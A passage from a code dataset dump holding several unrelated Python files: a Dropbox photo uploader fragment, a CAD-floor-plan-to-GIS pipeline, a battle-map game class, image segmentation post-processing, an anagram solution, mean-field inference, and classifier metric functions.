dest_folder[1:] + \"/\" + item.name\n source.to_file(dest)\nprint(\"Photos successfully optimized\")\nprint(\"Starting uploading\")\n# UPLOAD ALL PHOTOS\nphotos = os.listdir(\".\" + dest_folder)\ncount = 0\nfor item in photos:\n itempath = \".\" + dest_folder + \"/\" + item\n with open(itempath, 'rb') as f:\n dbx.files_upload(f.read(), dest_folder + \"/\" + item, mute=True)\n count += 1\n print(\"Progress: \", count, \"out of \", len(photos), \"uploaded\")\n\n# DELETING ORIGINAL PHOTOS\nif input(\"Do you want to delete the original photos? Y/N: \") == \"Y\":\n print(\"please wait...\")\n","sub_path":"tinioo.py","file_name":"tinioo.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"110983947","text":"# -*- coding: utf-8 -*-\n\"\"\"\nName: floorplans_to_gis\nAuthor: Ulises Guzman\nCreated: 06/29/2017\nCopyright: (c)\nArcGIS Version: ArcGIS Pro 1.4\nConda Environment : UlisesPro\nPython Version: 3x\nPostgreSQL Version: N/A\n--------------------------------------------------------------------------------\nThis script georeferences our CAD floor plans by creating world files and prj\n(projection files) for them.\n--------------------------------------------------------------------------------\n\"\"\"\nimport os\nimport shutil\nimport inspect\nimport time\nimport re\nfrom win32com import client\nimport pandas as pd\n# import geopandas as gpd\nimport arcpy\n\n\ndef lisp_dwg_runner(dwg, lisp, read_only_mode=True):\n \"\"\" This function run lisp routines against DWG files. It also provides\n a way for running lisp routines on read only mode, this is specially useful\n when running graphic reports for space management purposes.\n\n Args:\n dwg (string) = The full path to the dwg file\n lisp (string) = The full path to a lisp routine\n\n Returns:\n\n Examples:\n >>> lisp_dwg_runner(dwg, lisp, read_only_mode=True)\n Executing lisp_dwg_runner...\n Running lisp against dwg\n The lisp routine has been successfully executed\n \"\"\"\n # getting the name of the function programatically.\n func_name = inspect.currentframe().f_code.co_name\n print('Executing {}... '.format(func_name))\n acad = client.Dispatch('AutoCAD.Application')\n acad.Visible = True\n doc = acad.ActiveDocument\n # the AutoCAD console requires the use of double quotes in commands\n if read_only_mode:\n try:\n print('Running {} against {}'.format(lisp, dwg))\n doc.SendCommand('(command \"_.OPEN\" \"%s\" \"Y\")\\n' % dwg)\n doc.SendCommand(\"(acad-push-dbmod)\\n\")\n doc.SendCommand(\"SDI 1\\n\")\n doc.SendCommand(\"FILEDIA 0\\n\")\n doc.SendCommand('''(LOAD \"%s\")\\n''' % lisp)\n doc.SendCommand(\"(acad-pop-dbmod)\\n\")\n print('The routine has been successfully executed in read only'\n ' mode')\n except Exception as e:\n raise e\n\n else:\n try:\n print('Running {} against {}'.format(lisp, dwg))\n doc.SendCommand('(command \"_.OPEN\" \"%s\" \"Y\")\\n' % dwg)\n # doc.SendCommand(\"SDI 1\\n\")\n doc.SendCommand(\"FILEDIA 0\\n\")\n doc.SendCommand('''(LOAD \"%s\")\\n''' % lisp)\n # this part saves changes to the DWG file\n doc.SendCommand('(command \"_.save\" \"\" \"N\")\\n')\n print('The routine has been successfully executed')\n except Exception as e:\n raise e\n\n\ndef dwg_selector(fn=None, dwg_loc=None, pattern=None, **kwargs):\n \"\"\" This function filters and iterates over relevant dwg files while\n running a function on them if the fn argument is not None.\n\n Args:\n fn (function) = A function in which one of its arguments is a dwg file\n dwg_loc (string) = The full path to a folder that contains dwg files\n pattern (regex-string) = i.e. r'^S-(\\w)+-(?!ROOF)\\w+-DWG-BAS(\\.)dwg'\n kwargs = The arguments to be passed on to the embedded function\n\n Returns:\n\n Examples:\n >>> dwg_selector(fn=lisp_dwg_runner, dwg_loc=dwg_output_loc, pattern=None,\n lisp=xdata_to_gis, read_only_mode=False)\n Executing dwg_selector...\n Processing 'E:\\\\Users\\\\Desktop\\\\S-170B-01-DWG-BAS.dwg'\n Executing lisp_dwg_runner\n \"\"\"\n # getting the name of the function programatically.\n func_name = inspect.currentframe().f_code.co_name\n print('Executing {}... '.format(func_name))\n workspace = os.getcwd()\n if dwg_loc is None:\n dwg_loc = workspace\n if pattern is None:\n # selects DWG files excluding ROOF and MECH files\n pattern = r'^S-(\\w)+-(?!ROOF)\\w+-DWG-BAS(\\.)dwg'\n os.chdir(dwg_loc)\n try:\n dwg_selection = re.compile(pattern)\n # print(dwg_selection)\n for root, dirs, files in os.walk(\".\", topdown=False):\n for name in files:\n if dwg_selection.search(name):\n dwg_path = os.path.join(os.path.abspath(root), name)\n # the AutoCAD console requires the use of double quotes\n # when opening drawings\n dwg_path = dwg_path.replace('\\\\', '\\\\\\\\')\n # print(root, name)\n if fn is not None:\n print('Processing: {}'.format(dwg_path))\n time.sleep(1)\n fn(dwg_path, **kwargs)\n print('All wrapped up here sir! Will there be anything else?'\n '\\nJ.')\n except Exception as e:\n raise e\n\n\ndef gis_ready_files(dwg, dwg_filter, out_loc):\n \"\"\" This function selects and copies only the dwg files that match the\n values in a provided pandas series.\n\n Args:\n dwg (string) = A full path to a dwg file (i.e. 'E:\\\\S-170B-01-DWG-BAS.dwg')\n dwg_filter (pandas series) = This expresses which values are supposed to\n be kept by the function\n out_loc (string) = This is where the files will be copied to\n\n\n Returns:\n\n Examples:\n >>> gis_ready_files('S-378E-01-BAS.dwg', dwg_filter_series, out_loc=None)\n Executing gis_ready_files...\n The files have been copied to the desktop\n \"\"\"\n # getting the name of the function programatically.\n func_name = inspect.currentframe().f_code.co_name\n print('Executing {}... '.format(func_name))\n pattern = r'S-(\\w)+-(?!ROOF)\\w+-DWG-BAS(\\.)dwg'\n match = re.search(pattern, dwg)\n if match:\n found = match.group()\n if found in dwg_filter.unique():\n try:\n dwg = dwg.replace('\\\\\\\\', '\\\\')\n shutil.copy(dwg, out_loc)\n print(out_loc)\n except Exception as e:\n print(e)\n raise e\n print('The files have been copied to {}'. format(out_loc))\n\n\ndef cad_to_gis_obj(dwg, local_fc, out_loc=None, out_name=None):\n \"\"\" This function creates a GIS object from a local CAD feature class, its\n output default location is the 'in_memory' workspace\n\n Args:\n dwg (string) = A full path to a dwg file (i.e. 'E:\\\\S-170B-01-DWG-BAS.dwg')\n local_fc (string) = The name of a CAD local feature class\n out_loc (string) = The output location for the GIS object\n out_name (string) = The name to be given to the outputted GIS object\n\n Returns:\n\n Examples:\n >>> cad_to_gis_obj(dwg, 'SPACEDATA', dwg_filter_series, out_loc=None,\n out_name=SPACEDATA)\n Executing cad_to_gis_obj...\n The SPACEDATA gis feature has been created in in_memory\n \"\"\"\n # getting the name of the function programatically.\n func_name = inspect.currentframe().f_code.co_name\n print('Executing {}... '.format(func_name))\n dwg_data = r'{}\\\\{}'.format(dwg, local_fc)\n if out_loc is None:\n # Writing data to the in-memory workspace is often significantly faster\n # than writing to other formats such as a shapefile or geodatabase\n # feature class.\n out_loc = 'in_memory'\n if out_name is None:\n pattern = r'S-(\\w)+-(?!ROOF)\\w+-DWG-BAS(\\.)dwg'\n match = re.search(pattern, dwg)\n if match:\n out_name = match.group()\n # S-170B-01-DWG-BAS.dwg to S_170B_01_DWG_BAS\n out_name = out_name[:-4].replace('-', '_')\n try:\n print(dwg, dwg_data, out_loc, out_name)\n arcpy.FeatureClassToFeatureClass_conversion(dwg_data, out_loc,\n out_name, None, '', '')\n except Exception as e:\n raise e\n print(e)\n print(\n 'The {} gis feature has been created in {}'.format(out_name, out_loc))\n\n\ndef gis_obj_concatenate(out_name, out_loc=None, workspace=None,\n drop_field=None):\n \"\"\" This function merges all the GIS features in the provided workspace\n while deleting unnecessary fields\n\n Args:\n out_name (string)= The name to be given to the outputted GIS object\n out_loc (string) = The output location for the GIS object\n workspace (string) = The folder to which arcpy.env.workspace must be set\n drop_field (list) = A list of column names to be removed\n\n Returns:\n\n Examples:\n >>> gis_obj_concatenate('ucb_floorplans.shp',\n master_shp_output, workspace=None, drop_field=None)\n Executing gis_obj_concatenate...\n ucb_floorplans.shp has successfully created\n \"\"\"\n # getting the name of the function programatically.\n func_name = inspect.currentframe().f_code.co_name\n print('Executing {}... '.format(func_name))\n arcpy.env.overwriteOutput = True\n if workspace is None:\n arcpy.env.workspace = 'in_memory'\n if out_loc is None:\n out_loc = os.getcwd()\n if drop_field is None:\n drop_field = ['Entity', 'Layer', 'LyrColor', 'LyrLnType', 'LyrLineWt',\n 'Color', 'Linetype', 'Elevation', 'LineWt', 'RefName']\n output = '{}\\{}'.format(out_loc, out_name)\n try:\n featureclasses = arcpy.ListFeatureClasses()\n arcpy.Merge_management(featureclasses, output)\n arcpy.DeleteField_management(output, drop_field)\n # print(featureclasses)\n except Exception as e:\n print(e)\n raise e\n print('{} has been successfully created'.format(out_name))\n\n\nif __name__ == '__main__':\n # ******************* COPYING RELEVANT FLOOR PLANS ******************\n dwg_filter = r'\\\\Kingtut\\dwg\\student\\Mark\\GeoRef Floor Plans\\\\' \\\n 'floorplans_in_xrefs.csv'\n dwg_filter_series = pd.read_csv(dwg_filter, header=None, squeeze=True)\n # dwg_output_loc = r'E:\\Users\\ulgu3559\\Desktop\\WORLDTEST\\dwg_dos'\n dwg_output_loc = r'T:\\gis_scratch'\n dwg_loc = r'\\\\kingtut.colorado.edu\\smscale\\dwg'\n # gis_ready_files('S-378E-01-DWG-BAS.dwg', dwg_filter_series, out_loc=None)\n dwg_selector(fn=gis_ready_files, dwg_loc=dwg_loc, pattern=None,\n dwg_filter=dwg_filter_series, out_loc=dwg_output_loc)\n # ******************* CREATING GIS ATTRIBUTES ***********************\n # xdata_to_gis = r'G:/linkatt/XDATAtoGIS3.lsp'\n xdata_to_gis = r'T:\\gis_scripts\\lisp\\xdata_to_gis.lsp'\n dwg_selector(fn=lisp_dwg_runner, dwg_loc=dwg_output_loc, pattern=None,\n lisp=xdata_to_gis, read_only_mode=False)\n # meridian_sustaining_bldg = r'G:\\Ulises_Python_Scripts\\worldfiles'\n # meridian_sustaining_bldg = r'E:\\Users\\ulgu3559\\Desktop\\WORLDTEST\\dwg'\n # ******************* CREATING GIS FILE ****************************\n dwg_selector(fn=cad_to_gis_obj, dwg_loc=dwg_output_loc, pattern=None,\n local_fc='SPACEDATA', out_loc=None, out_name=None)\n # master_shp_output = r'E:\\Users\\ulgu3559\\Desktop\\WORLDTEST\\space_shp'\n master_shp_output = r'T:\\shapefiles\\floorplans'\n gis_obj_concatenate('ucb_floorplans.shp',\n master_shp_output, workspace=None, drop_field=None)\n","sub_path":"python/floorplans_to_gis.py","file_name":"floorplans_to_gis.py","file_ext":"py","file_size_in_byte":10975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"503302194","text":"\"\"\"\nThe BattleMap class.\nRepresents a battlefield as a data structure.\n\"\"\"\n\nimport copy\n\nclass BattleMap:\n \"\"\"\n A BattleMap contains information about a battlefield. It tracks object locations and terrain information.\n \"\"\"\n def __init__(self):\n self.terrain = [[]] # The \"ground\" of the battlefield (grass, hills, water, etc.)\n self.objects = [[]] # The \"objects\" of the battlefield (units, obstacles, etc.)\n self.dimension = [0, 0] # The size of the battlefield grid.\n self.name = 'map'\n self.victory_condition = ''\n\n self.grassTile = None\n self.hillTile = None\n self.waterTile = None\n\n def __str__(self):\n return self.name\n\n def data(self):\n \"\"\"\n Returns a string that represents the terrain grid.\n :return:\n \"\"\"\n string = ''\n for i in range(0, len(self.terrain)):\n string = string + '\\n' + str(self.terrain[i]).strip('[]')\n return string\n\n def onTileData(self):\n \"\"\"\n Returns a string that represents the objects grid.\n :return:\n \"\"\"\n string = ''\n for i in range(0, len(self.objects)):\n string = string + '\\n' + str(self.objects[i]).strip('[]')\n return string\n\n def makeTile(self, c):\n \"\"\"\n Returns a reference to the appropriate tile. Uses the Flyweight pattern to reduce memory usage.\n :param c: Specifies the type of tile to return.\n :return: The appropriate tile, given c.\n \"\"\"\n if(c in 'g'):\n if(self.grassTile is None):\n self.grassTile = GrassTile()\n tile = self.grassTile\n elif(c in 'h'):\n if (self.hillTile is None):\n self.hillTile = HillTile()\n tile = self.hillTile\n elif (c in 'w'):\n if (self.waterTile is None):\n self.waterTile = WaterTile()\n tile = self.waterTile\n else:\n raise BadMapFormatException\n\n return tile\n\n def addObject(self, onTile, location):\n col = copy.copy(location[0])\n row = copy.copy(location[1])\n self.objects[row][col] = onTile\n\n def replaceObjects(self, originals, replacements):\n \"\"\"\n Goes through the map's objects and replaces objects in originals with the corresponding object in replacements.\n :param originals:\n :param replacements:\n :return:\n \"\"\"\n # \"item\" is (row, col, character)\n map_object_generator = nested_list_traversal(self.objects)\n while True:\n try:\n item = map_object_generator.next()\n if str(item[2]) in originals:\n index = originals.index(item[2])\n replacement = replacements.pop(index)\n originals.remove(item[2])\n self.objects[item[0]][item[1]] = replacement\n replacement.setLocation( (item[0], item[1]) )\n except StopIteration:\n return 0\n except:\n raise\n\n def condensedObjects(self):\n map_object_generator = nested_list_traversal(self.objects)\n condensed_objects_list = []\n while True:\n try:\n item = map_object_generator.next()\n if 'empty' not in item:\n condensed_objects_list.append(item[2])\n except StopIteration:\n return condensed_objects_list\n except:\n raise\n\n def setMap(self, nestedList):\n self.terrain = nestedList\n self.objects = copy.deepcopy(nestedList)\n\n def moveObject(self, onTile):\n\n # Remove unit from object grid\n for i in range(0, self.dimension[1]):\n for j in range(0, self.dimension[0]):\n if(onTile == self.objects[i][j]):\n self.objects[i][j] = 'empty'\n\n # Place unit in new location on object grid\n newLocation = onTile.location\n newCol = newLocation[0]\n newRow = newLocation[1]\n self.objects[newRow][newCol] = onTile #Remember, object array is (y, x)\n\n def getObject(self, location):\n col = location[0]\n row = location[1]\n return self.objects[row][col]\n\n def isOccupied(self, locationTile):\n col = locationTile.location[0]\n row = locationTile.location[1]\n if('empty' == self.objects[row][col]):\n return False\n else:\n return True\n\n def setVictory(self, boolean):\n self.victory_condition = boolean\n\n\nclass Tile:\n \"\"\"\n The Tile class. Uses the Flyweight design pattern to minimize memory usage.\n\n At any given time, there exists only one of a particular tile type. All tiles of that type are just references to\n the single tile. This means that all grass tiles on a map are simply references to a single GrassTile object.\n \"\"\"\n def __str__(self):\n return 'Tile'\n\n def __repr__(self):\n return self.__str__()\n\nclass GrassTile(Tile):\n def __init__(self):\n self.cross = 'normal'\n self.slow = 0\n self.defense = 0\n\n def __str__(self):\n return 'g'\n\nclass HillTile(Tile):\n def __init__(self):\n self.cross = 'normal'\n self.slow = 1\n self.defense = 5\n\n def __str__(self):\n return 'h'\n\nclass WaterTile(Tile):\n def __init__(self):\n self.cross = 'water'\n self.slow = 0\n self.defense = 0\n\n def __str__(self):\n return 'w'\n\nclass SolidTile(Tile):\n def __init__(self):\n self.cross = 'wall'\n self.slow = 0\n self.defense = 0\n\n def __str__(self):\n return 's'\n\nclass BadMapFormatException(Exception):\n def __str__(self):\n return 'BadMapFormatException'\n\n\ndef nested_list_traversal(list):\n \"\"\"\n A python generator for nested lists.\n :param list: A nested list.\n :return: The row, column, and element occupying that spot in the list. Progresses forward each call.\n \"\"\"\n try:\n for row in range(0, len(list)):\n for col in range(0, len(list[row])):\n yield (row, col, list[row][col])\n except TypeError:\n yield list","sub_path":"src/Elements/BattleMap.py","file_name":"BattleMap.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"381796956","text":"import os\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom PIL import Image\r\nimport math\r\nfrom scipy.ndimage import measurements, morphology\r\nfrom PIL import Image\r\nfrom matplotlib import cm\r\n\r\n\r\n\r\n\r\n# MAIN #\r\ndef segmentation_post_proccess(img,mask,target_dir,img_name):\r\n #Support functions\r\n def circular_filter(radius):\r\n radius = np.int(radius)\r\n kernel = np.zeros((2 * radius + 1, 2 * radius + 1), np.uint8)\r\n y, x = np.ogrid[-radius:radius + 1, -radius:radius + 1]\r\n mask = x ** 2 + y ** 2 <= radius ** 2\r\n kernel[mask] = 1\r\n return kernel\r\n\r\n\r\n def image_preprocess(img):\r\n img_pil = Image.fromarray(np.uint8(img*255)).resize((512, 512))\r\n img = np.resize(img, (512, 512, 3))\r\n return img_pil\r\n\r\n\r\n\r\n def mask_cropper(img, mask):\r\n # Crop image with 2D mask\r\n big_mask_inter = np.zeros((512, 512, 3))\r\n big_mask_inter[:, :, 0] = mask\r\n big_mask_inter[:, :, 1] = mask\r\n big_mask_inter[:, :, 2] = mask\r\n im_array = np.asarray(img)\r\n img_rgb = Image.fromarray(im_array.astype('uint8'), 'RGB')\r\n cropped_img_array = img_rgb * np.uint8(big_mask_inter)\r\n cropped_img = Image.fromarray(cropped_img_array.astype('uint8'), 'RGB')\r\n return cropped_img\r\n\r\n def morphological_algorithm(mask, image, flag='segmentation succeed'):\r\n ret, thresh_mask = cv2.threshold(mask, 127, 1, cv2.THRESH_BINARY)\r\n\r\n num_labels_orig, labels_im_orig = cv2.connectedComponents(thresh_mask)\r\n (unique, counts) = np.unique(labels_im_orig, return_counts=True)\r\n\r\n frequencies = np.asarray((unique[1:], counts[1:])).T # Return [unique1,numbers;unique2,numbers..]\r\n max_pixels = np.max(frequencies[:, 1], axis=0)\r\n label_radius = np.floor((((max_pixels) / 8) / (math.pi)) ** 0.5)\r\n kernel_8 = circular_filter(label_radius)\r\n opening = cv2.morphologyEx(thresh_mask, cv2.MORPH_OPEN, kernel_8)\r\n largest_label = np.argmax(frequencies[:, 1], axis=0) + 1\r\n largest_component = labels_im_orig == largest_label\r\n x = opening + largest_component\r\n x1 = x == 1\r\n x2 = x == 2\r\n opening_and_component = np.uint8(x1 + x2)\r\n closing = cv2.morphologyEx(opening_and_component, cv2.MORPH_CLOSE, kernel_8)\r\n num_labels_clos, labels_im_clos = cv2.connectedComponents(closing)\r\n list_of_centers = []\r\n for i in range(1, num_labels_clos):\r\n center_i = measurements.center_of_mass(labels_im_clos == i)\r\n list_of_centers.append([np.floor(center_i[1]), np.floor(center_i[0])])\r\n euclidean_pwr = (list_of_centers - np.array([256, 256])) ** 2\r\n euclidean_dist = (euclidean_pwr[:, 0] + euclidean_pwr[:, 1]) ** 0.5\r\n most_centered_label = np.argmin(euclidean_dist) + 1\r\n binary_mask = labels_im_clos == most_centered_label\r\n binary_mask_filled = morphology.binary_fill_holes(binary_mask, structure=None, output=None, origin=0)\r\n\r\n kernel = np.ones((3, 3), np.uint8)\r\n erosion = cv2.erode(binary_mask_filled.astype('uint8'), kernel, iterations=1)\r\n edges = binary_mask_filled - erosion\r\n cropped_image = mask_cropper(image, binary_mask_filled)\r\n num_labels_edges, labels_edges = cv2.connectedComponents(edges)\r\n if num_labels_edges > 2:\r\n flag = 'segmentation failed'\r\n return binary_mask, cropped_image, edges, flag\r\n\r\n\r\n\r\n\r\n #Main function\r\n\r\n image_pil = image_preprocess(img)\r\n binary_mask, cropped_image, edges, flag = morphological_algorithm(mask, image_pil)\r\n Cropped_img_loc =os.path.join(target_dir, 'Cropped_Img')\r\n if not os.path.isdir(Cropped_img_loc):\r\n os.mkdir(Cropped_img_loc)\r\n cropped_image.save(os.path.join(Cropped_img_loc, img_name))\r\n binary_mask = Image.fromarray(binary_mask)\r\n binary_mask.save(os.path.join(target_dir, 'binary_mask_' + img_name))\r\n binary_edges = Image.fromarray(edges*255)\r\n binary_edges.save(os.path.join(target_dir, 'binary_edges_' + img_name))\r\n return binary_mask, cropped_image, edges, flag\r\n","sub_path":"eye pathology application/segmentation_result_morphological_func.py","file_name":"segmentation_result_morphological_func.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"527204770","text":"import collections\n\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n\n anagrams, result = collections.defaultdict(list), []\n\n for s in strs:\n sorted_str = ''.join(sorted(s))\n anagrams[sorted_str].append(s)\n for anagram in anagrams.values():\n anagram.sort()\n result.append(anagram)\n return result\n\n\nstrs = ['eat', 'tea', 'tan', 'ate', 'nat']\nresult = Solution().groupAnagrams(strs)\nprint(result)\n \n","sub_path":"anagrams/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"114768792","text":"import numpy as np\n\ndef mean_field(U, P, edges, max_iter=100):\n \"\"\"Compute mean-field marginals.\n\n Inputs: \n (n_nodes, n_states) matrix of unary potentials U.\n (n_edges, n_states, n_states) matrix of edge potentials P\n (n_edges,) list of (vi, vj) tuples indicating edges\n max number of iterations of mean field (default=100)\n\n The algorithm runs for max_iter iterations or until convergence\n threshold of 1e-4.\n \"\"\"\n iter = 0\n n_nodes, n_states = U.shape\n\n edge_potentials = { v : dict() for v in xrange(n_nodes) }\n\n for i, (v1, v2) in enumerate(edges):\n edge_potentials[v1][v2] = P[i]\n edge_potentials[v2][v1] = P[i].T\n\n Q = U.copy()\n\n max_err = 1\n while iter < max_iter and max_err > 1e-4:\n max_err = 0\n for i in xrange(n_nodes):\n t = U[i].copy()\n for n, E in edge_potentials[i].iteritems():\n t += E.dot(Q[n])\n # print t\n t = np.exp(t)\n Q_new = t / np.sum(t)\n max_err = np.max([max_err, np.linalg.norm(Q_new - Q[i])])\n Q[i] = Q_new\n iter += 1\n\n return Q","sub_path":"pgms/meanfield.py","file_name":"meanfield.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"417176681","text":"import numpy as np\nfrom torch import Tensor\nfrom sklearn.metrics import roc_curve, auc, hamming_loss, accuracy_score, recall_score, precision_score, f1_score, roc_auc_score\nimport pdb\n\nCLASSIFICATION_THRESHOLD: float = 0.5 # Best keep it in [0.0, 1.0] range\n \nlabels_list = ['P1','P2','P3','P4','P5']\n\n\n# def accuracy(out, labels):\n# outputs = np.argmax(out, axis=1)\n# return np.sum(outputs == labels)\n\n\ndef recall_macro(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.cpu()\n y_pred = np.argmax(y_pred, axis=1)\n print(y_pred)\n y_true = y_true.cpu()\n y_true = np.argmax(y_true, axis=1)\n print(y_true)\n return recall_score(y_pred, y_true, average='macro')\n\ndef recall_by_class(y_pred: Tensor, y_true: Tensor, labels: list = labels_list):\n y_pred = y_pred.cpu()\n y_pred = np.argmax(y_pred, axis=1)\n print(y_pred)\n y_true = y_true.cpu()\n y_true = np.argmax(y_true, axis=1)\n d = []\n for i in range(len(labels)): \n out_pred = []\n out_true = []\n num1 = 0\n num2 = 0\n for j in y_pred:\n if j == i:\n out_pred.append(1)\n num1 += 1\n else:\n out_pred.append(0)\n for j in y_true:\n if j == i:\n out_true.append(1)\n num2 += 1\n else:\n out_true.append(0)\n print(num1,num2)\n d.append(recall_score(out_pred, out_true, average='binary'))\n return d\n\ndef recall_micro(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > 0.5).cpu()\n y_true = y_true.cpu()\n return recall_score(y_pred, y_true, average='micro')\n\ndef precision_macro(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > 0.5).cpu()\n y_true = y_true.cpu()\n return precision_score(y_pred, y_true, average='macro')\n\ndef precision_micro(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > 0.5).cpu()\n y_true = y_true.cpu()\n return precision_score(y_pred, y_true, average='micro')\n\ndef precision_by_class(y_pred: Tensor, y_true: Tensor, labels: list = labels_list):\n y_pred = y_pred.cpu()\n y_pred = np.argmax(y_pred, axis=1)\n print(y_pred)\n y_true = y_true.cpu()\n y_true = np.argmax(y_true, axis=1)\n d = []\n for i in range(len(labels)): \n out_pred = []\n out_true = []\n for j in y_pred:\n if j == i:\n out_pred.append(1)\n else:\n out_pred.append(0)\n for j in y_true:\n if j == i:\n out_true.append(1)\n else:\n out_true.append(0)\n d.append(precision_score(out_pred, out_true, average='binary'))\n return d\n\ndef f1_macro(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > 0.5).cpu()\n y_true = y_true.cpu()\n return f1_score(y_pred, y_true, average='macro')\n\ndef f1_micro(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > 0.5).cpu()\n y_true = y_true.cpu()\n return f1_score(y_pred, y_true, average='micro')\n\ndef f1_by_class(y_pred: Tensor, y_true: Tensor, labels: list = labels_list):\n y_pred = y_pred.cpu()\n y_pred = np.argmax(y_pred, axis=1)\n print(y_pred)\n y_true = y_true.cpu()\n y_true = np.argmax(y_true, axis=1)\n d = []\n for i in range(len(labels)): \n out_pred = []\n out_true = []\n for j in y_pred:\n if j == i:\n out_pred.append(1)\n else:\n out_pred.append(0)\n for j in y_true:\n if j == i:\n out_true.append(1)\n else:\n out_true.append(0)\n d.append(f1_score(out_pred, out_true, average='binary'))\n return d\n\n\ndef accuracy(y_pred: Tensor, y_true: Tensor):\n y_pred = y_pred.cpu()\n outputs = np.argmax(y_pred, axis=1)\n return np.mean(outputs.numpy() == y_true.detach().cpu().numpy())\n\n\ndef accuracy_multilabel(y_pred: Tensor, y_true: Tensor, sigmoid: bool = True):\n if sigmoid:\n y_pred = y_pred.sigmoid()\n y_pred = y_pred.cpu()\n y_true = y_true.cpu()\n outputs = np.argmax(y_pred, axis=1)\n real_vals = np.argmax(y_true, axis=1)\n return np.mean(outputs.numpy() == real_vals.numpy())\n\n\ndef accuracy_thresh(\n y_pred: Tensor,\n y_true: Tensor,\n thresh: float = CLASSIFICATION_THRESHOLD,\n sigmoid: bool = True,\n):\n \"Compute accuracy when `y_pred` and `y_true` are the same size.\"\n if sigmoid:\n y_pred = y_pred.sigmoid()\n return ((y_pred > thresh) == y_true.bool()).float().mean().item()\n\n\n# return np.mean(((y_pred>thresh)==y_true.byte()).float().cpu().numpy(), axis=1).sum()\n\n\ndef fbeta(\n y_pred: Tensor,\n y_true: Tensor,\n thresh: float = 0.3,\n beta: float = 2,\n eps: float = 1e-9,\n sigmoid: bool = True,\n):\n \"Computes the f_beta between `preds` and `targets`\"\n beta2 = beta ** 2\n if sigmoid:\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > thresh).float()\n y_true = y_true.float()\n TP = (y_pred * y_true).sum(dim=1)\n prec = TP / (y_pred.sum(dim=1) + eps)\n rec = TP / (y_true.sum(dim=1) + eps)\n res = (prec * rec) / (prec * beta2 + rec + eps) * (1 + beta2)\n return res.mean().item()\n\n\ndef roc_auc(y_pred: Tensor, y_true: Tensor):\n # ROC-AUC calcualation\n # Compute ROC curve and ROC area for each class\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n\n y_true = y_true.detach().cpu().numpy()\n y_pred = y_pred.detach().cpu().numpy()\n\n # Compute micro-average ROC curve and ROC area\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_true.ravel(), y_pred.ravel())\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n return roc_auc[\"micro\"]\n\n\ndef Hamming_loss(\n y_pred: Tensor,\n y_true: Tensor,\n sigmoid: bool = True,\n thresh: float = CLASSIFICATION_THRESHOLD,\n sample_weight=None,\n):\n if sigmoid:\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > thresh).cpu()\n y_true = y_true.cpu()\n return hamming_loss(y_true, y_pred, sample_weight=sample_weight)\n\n\ndef Exact_Match_Ratio(\n y_pred: Tensor,\n y_true: Tensor,\n sigmoid: bool = True,\n thresh: float = CLASSIFICATION_THRESHOLD,\n normalize: bool = True,\n sample_weight=None,\n):\n if sigmoid:\n y_pred = y_pred.sigmoid()\n y_pred = (y_pred > thresh).float()\n return accuracy_score(\n y_true, y_pred, normalize=normalize, sample_weight=sample_weight\n )\n\n\ndef F1(y_pred: Tensor, y_true: Tensor, threshold: float = CLASSIFICATION_THRESHOLD):\n return fbeta(y_pred, y_true, thresh=threshold, beta=1)\n\ndef roc_auc_score_by_class(y_pred:Tensor, y_true:Tensor, labels:list = labels_list):\n y_pred = y_pred.cpu()\n y_pred = np.argmax(y_pred, axis = 1).numpy()\n y_true = y_true.cpu()\n y_true = y_true.detach().cpu().numpy()\n roc_auc_score_d = {}\n for i in range(len(labels)):\n lb = LabelBinarizer()\n y_true_i = y_true.copy()\n y_true_i[y_true != i] = len(labels) + 1\n y_true_i = lb.fit_transform(y_true_i)\n y_pred_i = y_pred.copy()\n y_pred_i[y_pred != i] = len(labels) + 1\n y_pred_i = lb.transform(y_pred_i)\n roc_auc_score_d[labels[i]] = roc_auc_score(y_true_i, y_pred_i, average = 'micro')\n return roc_auc_score_d\n","sub_path":"fast_bert/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":7331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"283848498","text":"\ngst_str = (\"nvarguscamerasrc ! video/x-raw(memory:NVMM), width=(int)480, height=(int)360, format=(string)NV12, framerate=(fraction)60/1 ! nvvidconv flip-method=0 ! video/x-raw, width=(int)480, height=(int)360, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink\")\n#gst_str = (\"nvarguscamerasrc ! video/x-raw(memory:NVMM), width=(int)640, height=(int)480, format=(string)NV12, framerate=(fraction)60/1 ! nvvidconv flip-method=0 ! video/x-raw, width=(int)640, height=(int)480, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink\")\n\n\nimport cv2\nimport numpy as np\nimport datetime\nimport time\nimport os\nfrom uuid import uuid1\nimport sys\n\nblocked_dir = 'dataset/blocked'\nfree_dir = 